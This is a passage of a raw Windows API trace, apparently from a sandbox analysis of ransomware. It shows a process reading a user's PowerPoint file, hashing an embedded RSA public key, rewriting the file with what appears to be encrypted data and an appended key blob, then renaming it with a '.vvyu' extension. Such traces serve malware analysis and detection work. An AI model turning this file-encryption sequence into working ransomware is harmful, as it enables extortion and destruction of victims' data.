Size=0x60) returned 0x2cb4658 [0193.188] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e956e0 | out: hHeap=0x620000) returned 1 [0193.188] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\2oZu1wT.ppt") returned=".ppt" [0193.188] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\2oZu1wT.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\2ozu1wt.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.189] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=8863) returned 1 [0193.190] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.192] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x2279, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.193] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.196] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.196] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.196] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x229f, lpOverlapped=0x0) returned 1 [0193.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.197] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.197] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.198] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.198] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.198] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.198] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.198] GetLastError () returned 0x0 [0193.198] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.198] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.199] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.199] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.199] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x22a0) returned 0x2ea0a68 [0193.199] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e956e0 [0193.199] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95728 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.200] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea2d10 [0193.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d10 | out: hHeap=0x620000) returned 1 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93798 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c93780 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.201] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.203] GetCurrentThreadId () returned 0x66c [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ed50 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.203] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.204] GetCurrentThreadId () returned 0x66c [0193.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93780 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93798 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93768 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937f8 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93810 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937b0 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93780 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea2d10 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea2f20 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93780 | out: hHeap=0x620000) returned 1 [0193.207] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3138 [0193.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f20 | out: hHeap=0x620000) returned 1 [0193.210] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3138 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937b0 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93798 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0193.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95728 | out: hHeap=0x620000) returned 1 [0193.212] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d10 | out: hHeap=0x620000) returned 1 [0193.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0193.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0193.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0193.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0193.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0193.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0193.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.215] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0a68*, nNumberOfBytesToWrite=0x229a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea0a68*, lpNumberOfBytesWritten=0x312fb14*=0x229a, lpOverlapped=0x0) returned 1 [0193.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.216] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x229f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.216] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.216] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.216] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.217] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.217] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.218] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.218] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.218] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.218] CloseHandle (hObject=0x568) returned 1 [0193.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.219] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea0a68 [0193.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.220] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\2oZu1wT.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\2ozu1wt.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\2oZu1wT.ppt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\2ozu1wt.ppt.vvyu")) returned 1 [0193.221] HeapFree (in: 